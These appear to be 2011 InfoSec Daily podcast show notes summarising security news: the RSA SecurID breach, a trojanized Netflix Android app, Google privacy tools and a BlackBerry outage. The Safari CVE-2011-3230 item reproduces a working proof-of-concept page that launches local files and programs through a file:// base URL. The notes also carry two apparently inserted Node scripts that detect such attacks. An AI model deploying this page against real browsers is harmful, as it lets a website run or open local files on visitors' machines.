Your daily source of Pwnage, Policy and Politics.


Episode 495 – The Blame Game, Netflix Fakester, Dave’s Moonlighting, Private Googlez, Safari & RIM

InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011.  Tonight's podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z.

Announcements:

Hack3rCon 2011
When: October 21-23rd, 2011
Where: the Charleston House Hotel and Conference Center
http://www.hack3rcon.org/

NordSec 2011
When: October 26–28, 2011
Where: Tallinn Science Park “Tehnopol”, Tallinn, Estonia
http://nordsec2011.cyber.ee/

New Hampshire InfoSec Tweetup
When: October 29, 2011
Where: Pawtuckaway State Park in Nottingham, NH
http://nhinfosectweetup.eventbrite.com/
(It is just a gathering of security professionals and their families. No talks, just a bunch of like-minded people and some good food.)

SkyDogCon
When: Nov 4th – Nov 6th
Where: Holiday Inn Airport, Nashville, TN
http://www.skydogcon.com

Phreaknic
When: Nov 4th – Nov 6th
Where: Days Inn Stadium, Nashville, TN
http://www.phreaknic.info

BSidesDFW 2011
When: November 5th, 2011
Where: Microsoft Technology Center Dallas
http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
Cost = FREE

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org

BSides Delaware
When: November 11-12, 2011
Where: Wilmington University, Delaware Campus
http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010

SANS Mentoring: Forensics 408 – Computer Forensic Essentials
When: Starts November 30, 2011
Where: Atlanta, GA
Discount Code: M1011IPAD (free iPad 2)
http://www.sans.org/mentor/details.php?nid=25504


Stories:
Source: http://nakedsecurity.sophos.com/2011/10/11/rsa-blames-nation-state-attack/

RSA has revealed that it believes two groups, working on behalf of a single nation state, hacked into its servers and stole information related to the company's SecurID two-factor authentication products.

Speaking at the RSA Security Conference in London, RSA's executive chairman Art Coviello described the high profile attack that made headlines around the world.

"There were two individual groups from one nation state, one supporting the other. One was very visible and one less so. We've not attributed it to a particular nation state, although we're very confident that with the skill, sophistication and resources involved it could only have been a nation state."

Inevitably, people are likely to assume that China might have been involved in the attack – but there's nothing in RSA's statements to either implicate China or to back-up the claims that any country was involved.

It seems very odd to me for a company to say that they have determined that a country had attacked them, but to not then name the country.

You will probably remember that RSA didn't do itself many favours when it first admitted the breach in April, playing its cards rather close to its chest then, and not saying much more about the ongoing security of its tokens than:

"we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers."

Unfortunately, the truth was that RSA's server breach did subsequently lead to another attack against a leading US military contractor, and the security firm's hand was forced into offering to replace some customers' SecurID devices.

The malware attack

RSA was struck by a targeted malware attack, emailed to a small number of their employees.

Attached to the email was a file, "2011 Recruitment plan.xls". The poorly worded email was designed to trick users into opening the attachment. And – unfortunately – at least one of them fell for the trap.

The Excel spreadsheet had been boobytrapped, and contained a malicious Flash payload inside it. Opening the file exploited an Adobe zero-day vulnerability that then downloaded a remote access Trojan horse called Poison Ivy onto the computer.

Once the Trojan horse was in place, the hackers could begin to steal information and inveigle their way into RSA's network infrastructure.

APT or not?
At the time of the initial disclosure, RSA's Coviello described the attack as an "extremely sophisticated" Advanced Persistent Threat (APT).

Some wags in the security industry have noted that corporate victims of malware attacks might like to use the "APT" buzzword to make a breach seem less embarrassing.

Whether that's fair or not is open to debate. But it certainly puts a better spin on things if you claim that highly-skilled hackers with the resources of an unnamed country attacked your computer network rather than your common-or-garden cybercriminal.
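The delivery mechanism above (a spreadsheet carrying an embedded Flash object) is something you can screen for without needing the exploit itself. The following Node script is an added example, not code from Sophos, RSA or the podcast: it scans any file for the three SWF signatures (FWS uncompressed, CWS zlib-compressed, ZWS LZMA-compressed) and sanity-checks the header that follows, so that ordinary text that happens to contain the letters "FWS" is not flagged. The two input buffers, the version cap and the OLE2 magic used for the samples are constructed here for illustration.

```javascript
// Added example: heuristic detection of a SWF (Flash) object embedded in an
// arbitrary container such as a .xls. Not from the original article.
const SWF_MAGICS = ["FWS", "CWS", "ZWS"];
// SWF versions are small integers; assumption for this example: cap at 50.
const MAX_PLAUSIBLE_VERSION = 50;

// An SWF header is: 3-byte signature, 1-byte version, 4-byte little-endian
// length (total file length for FWS, uncompressed length for CWS/ZWS).
// Return a hit description if the bytes at `off` look like such a header.
function checkSwfHeader(buf, off) {
  if (off + 8 > buf.length) return null;
  const kind = buf.toString("latin1", off, off + 3);
  const version = buf[off + 3];
  const length = buf.readUInt32LE(off + 4);
  if (version < 1 || version > MAX_PLAUSIBLE_VERSION) return null;
  if (length < 8) return null; // the length counts the 8-byte header itself
  // A zlib stream begins with a CMF byte of 0x78 for the deflate method,
  // which gives one more cheap check for CWS.
  if (kind === "CWS" && (off + 8 >= buf.length || buf[off + 8] !== 0x78)) return null;
  return { offset: off, kind, version, length };
}

// Scan the whole buffer for every signature and keep the plausible headers.
function findEmbeddedSwf(buf) {
  const hits = [];
  for (const magic of SWF_MAGICS) {
    let pos = buf.indexOf(magic, 0, "latin1");
    while (pos !== -1) {
      const hit = checkSwfHeader(buf, pos);
      if (hit) hits.push(hit);
      pos = buf.indexOf(magic, pos + 1, "latin1");
    }
  }
  return hits.sort((a, b) => a.offset - b.offset);
}

// Constructed samples (not real attachments): an OLE2-style magic, padding,
// then a CWS header (version 10, declared length 4096, zlib CMF byte) with
// junk after it; and a benign document whose text merely contains "FWS".
const OLE_MAGIC = Buffer.from([0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1]);
const swfHeader = Buffer.alloc(9);
swfHeader.write("CWS", 0, "latin1");
swfHeader[3] = 10;
swfHeader.writeUInt32LE(4096, 4);
swfHeader[8] = 0x78;
const MALICIOUS_XLS = Buffer.concat([OLE_MAGIC, Buffer.alloc(512), swfHeader, Buffer.alloc(64, 0x9c)]);
const BENIGN_XLS = Buffer.concat([
  OLE_MAGIC,
  Buffer.from("Attachment: 2011 Recruitment plan (FWSA approved)"),
  Buffer.alloc(64),
]);

console.log("malicious:", findEmbeddedSwf(MALICIOUS_XLS)); // one CWS hit at offset 520
console.log("benign:", findEmbeddedSwf(BENIGN_XLS));       // []
```

The version and length checks are what keep this from firing on every "FWS" in a text run; a real triage tool would go on to inflate the CWS body and inspect the tags, but the header check alone is enough to pull a spreadsheet out of the mail flow for a closer look.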

Source: https://www.net-security.org/malware_news.php?id=1873

When Netflix released an Android client app earlier this year, it also witnessed the attempts of various app developers who tried to make a pirated copy of it work on other devices and platforms.

As unwelcome as this development was, the situation has been made even worse as cyber criminals have also taken advantage of this gap between supply and demand and have pushed out a Trojanized version of the app bent on stealing the users' account login credentials.

"Despite the fact that there are multiple permissions being requested at the time of installation – identical to the permissions required by the actual app – our analysis shows that this is, in fact, a red herring, probably used to add to the illusion that the end user is dealing with the genuine article," point out Symantec researchers.

Once the victim enters his account credentials, the information is automatically sent to a remote server which is, luckily, currently offline. Also, the Trojanized app doesn't react any differently when the incorrect email/password combination is entered.

After the "Sign In" button is pressed, the user is faced with a screen saying that the app is incompatible with his device and urges him to download a different app, but doesn't link to it or attempt to download it automatically.

A click on the "Cancel" button below that explanation triggers the uninstall process. "Any attempt to prevent the uninstall process results in the user being returned to the previous screen with the incompatibility message," say the researchers.

Source: http://1dave1cup.com/

Please ignore how nasty that URL sounds; it's actually legitimate. Since early in the year, our own Dave Kennedy has been teaching some preparation classes for the Offensive Security Ohio Chapter. If you dare follow that link, you will find audio and video recordings of these classes that will attempt to bring you up to speed for obtaining some of the Offensive Security certifications, such as the OSCP. If you happen to be near North Canton, Ohio, you can actually attend these classes live, but I have to warn you that you will probably be extremely lost without going through (and fully comprehending) all of the audio and video to date. The OSCP/OSCE/OSWP are heavy-duty certs that even some of the biggest names in the industry have walked away from crying. If you intend to attempt these certs, it's well worth your time to watch/listen to this series to help minimize the pain.

Source: https://www.google.com/intl/en/privacy/tools.html

Someone from Google pointed my attention to this page the other day.  It’s the Google privacy center.  They have consolidated links to all of their privacy tools in one place.  In here you’ll find links to things such as Street View blurring, the Data Liberation Front, information on Encrypted Search and much more.  The one particular item that my anonymous friend from Google pointed out was something called “Search Personalization Opt Out”.  Clicking this link leads to a page referring to turning off search history personalization.

Apparently he heard me ranting about this the other day on ISD and wanted to steer me in the right direction.  This is what the page says:

“Turning off search history personalization:

Google sometimes customizes your search results based on your past search activity on Google. This customization includes searches you've done and results you've clicked. Since personalized search treats signed-in and signed-out users differently, the instructions for turning off search history personalization are a little different in each case.

Signed in searches
To disable history-based search customizations while signed in, you'll need to remove Web History from your Google Account. You can also choose to remove individual items. Note that removing this service deletes all your old searches from Web History.

Signed out searches
If you aren't signed in to a Google Account, your search experience will be customized based on past search information linked to a cookie on your browser. To disable these types of customizations, follow these steps:

  1. In the top right corner of the search results page, click Web History.
  2. On the resulting page, click Disable customizations based on search activity. (Because this preference is stored in a cookie, it'll affect anyone else who uses the same browser and computer as you.)

Or, if you'd rather just delete the current cookie storing searches from your browser and start fresh, clear your browser's cookies.

Note: If you've disabled search customizations, you'll need to disable it again after clearing your browser cookies; clearing your Google cookie turns on history-based customizations.”

Sounds fine and dandy until you stop and analyze it a bit more.  Looking at the “signed in” searches section, you’ll notice that they have you removing your web history from the account.  But now say that you are still surfing while signed in, what’s to stop it from building back up again?  What I would like to see from Google is an actual checkbox that says “Don’t collect web history”.  It seems like they continue to dance around that issue.

Source: http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html

There's not a ton to say about this bug aside from "Yikes!" I think the PoC speaks for itself. This allows you to send any "file:" URL to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the HTML provided below.


<html>
<head>
<!-- Every relative path on this page resolves against file://, so the
     navigation below becomes a file: URL handed to LaunchServices -->
<base href="file://">
<script>
function DoIt() {
  var target = document.getElementById("cmdToRun").value;
  alert(target);
  // Navigating the document to the path launches it via LaunchServices
  document.location = target;
}
</script>
</head>
<body>
<select id="cmdToRun">
<option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>
<option value="/etc/passwd">Launch /etc/passwd</option>
<option value="/Applications/Utilities/Bluetooth File Exchange.app">Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type="button" value="Launch" onclick="DoIt()">
<br />
</body>
</html>

Apple's advisory: http://support.apple.com/kb/HT5000
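The whole PoC rests on one browser behaviour: once the document base is file://, a bare path like /usr/sbin/netstat resolves to a file: URL. The following Node script is an added example (not from the vttynotes post, Apple, or the PoC author) that shows that resolution step and doubles as a cheap content check for pages that try it. It pulls the base href and each option value out of a page and resolves them with the WHATWG URL parser, the same algorithm the browser uses, flagging any target that lands on the file: scheme. The sample HTML and the attacker hostname are constructed for illustration.

```javascript
// Added example: resolve a page's navigation targets the way the browser
// would and flag those that end up on file:. Not code from the original PoC.
// Node's global URL class implements the WHATWG URL Standard, so the
// resolution (including percent-encoding of spaces) matches Safari's.

// Pull the <base href> (if any) and every <option value> out of the page.
// A regex scan is adequate for minimal, PoC-style documents like this one.
function extractTargets(html) {
  const baseMatch = html.match(/<base\s+href="([^"]*)"/i);
  const base = baseMatch ? baseMatch[1] : null;
  const values = [];
  const optionRe = /<option\s+value="([^"]*)"/gi;
  let m;
  while ((m = optionRe.exec(html)) !== null) values.push(m[1]);
  return { base, values };
}

// Resolve each target against the effective document base (the <base href>
// resolved against the page's own URL, or the page URL when there is none)
// and report which ones reach the file: scheme, i.e. LaunchServices.
function resolveLaunchTargets(html, pageUrl) {
  const { base, values } = extractTargets(html);
  const effectiveBase = base ? new URL(base, pageUrl).href : pageUrl;
  return values.map((raw) => {
    const resolved = new URL(raw, effectiveBase);
    return { raw, href: resolved.href, isFile: resolved.protocol === "file:" };
  });
}

// Constructed sample with the shape of the PoC, served from a remote page.
const SAMPLE_HTML = `
<html><head><base href="file://"></head><body>
<select id="cmdToRun">
<option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>
<option value="/etc/passwd">Launch /etc/passwd</option>
<option value="/Applications/Utilities/Bluetooth File Exchange.app">Launch</option>
</select></body></html>`;

// The same page without the base element: paths stay on the page's origin.
const BENIGN_HTML = SAMPLE_HTML.replace('<base href="file://">', "");

// Hypothetical attacker origin, used only as the page URL for resolution.
const PAGE_URL = "http://attacker.example/poc.html";

console.log(resolveLaunchTargets(SAMPLE_HTML, PAGE_URL)); // three file: targets
console.log(resolveLaunchTargets(BENIGN_HTML, PAGE_URL)); // three http: targets
```

Run against a page fetched over HTTP, any isFile hit is a strong signal: a remote document has no legitimate reason to steer navigation at the local filesystem, and that is exactly the condition Apple's fix restricts.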

Source:  http://threatpost.com/en_us/blogs/rim-exec-says-blackberry-service-wasnt-hackedreally-101311

Research in Motion CTO David Yach said that the rolling service outages its Blackberry mobile phone system has experienced in the last few days weren't due to a security compromise, but to an unsuccessful failover following a core switch failure in Europe.

"I know there's often speculation in these types of situations of a potential breach or hack as the cause," Yach offered on Thursday. But he assured those listening that the Blackberry service didn't appear to have been hacked. "We've seen no evidence that this is the case," he said.

Instead, the company is dealing with a backlog of untold numbers of unsent messages.

"A large backlog of messages has been generated. We've had to throttle traffic to stabilize service while we process the substantial backlog of messages in a controlled manner. That's why we're seeing ongoing issues and impacts to other regions of the world," Yach said on the call, an excerpt of which was posted by the BBC.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.
